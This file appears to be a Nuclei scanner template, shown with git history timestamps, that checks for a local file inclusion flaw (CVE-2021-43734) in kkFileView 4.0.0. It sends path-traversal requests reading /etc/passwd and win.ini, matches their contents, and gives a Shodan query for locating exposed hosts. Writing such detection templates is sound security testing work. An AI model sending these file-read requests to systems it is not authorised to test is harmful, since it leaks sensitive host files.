nuclei-templates/http/cves/2021/CVE-2021-43734.yaml

45 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-18 11:29:11 +00:00
id: CVE-2021-43734
info:
name: kkFileview v4.0.0 - Local File Inclusion
2022-08-18 11:29:11 +00:00
author: arafatansari
2022-08-18 11:39:16 +00:00
severity: high
description: |
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
2022-08-18 11:29:11 +00:00
reference:
- https://github.com/kekingcn/kkFileView/issues/304
2022-08-19 09:29:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
2022-08-19 09:34:57 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-08-19 09:34:57 +00:00
cve-id: CVE-2021-43734
cwe-id: CWE-22
cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:*
epss-score: 0.0046
2022-08-18 11:29:11 +00:00
metadata:
max-request: 2
2022-08-18 11:29:11 +00:00
shodan-query: http.html:"kkFileView"
2023-06-04 08:13:42 +00:00
verified: true
2022-12-15 20:50:22 +00:00
tags: cve,cve2021,kkfileview,traversal,lfi
2022-08-18 11:29:11 +00:00
http:
2022-08-18 11:29:11 +00:00
- method: GET
path:
2022-08-19 09:14:27 +00:00
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
2022-12-15 20:42:07 +00:00
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
2022-08-18 11:29:11 +00:00
2022-12-15 20:42:07 +00:00
stop-at-first-match: true
2022-08-18 11:29:11 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2022-12-15 20:42:07 +00:00
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
2022-08-18 11:29:11 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15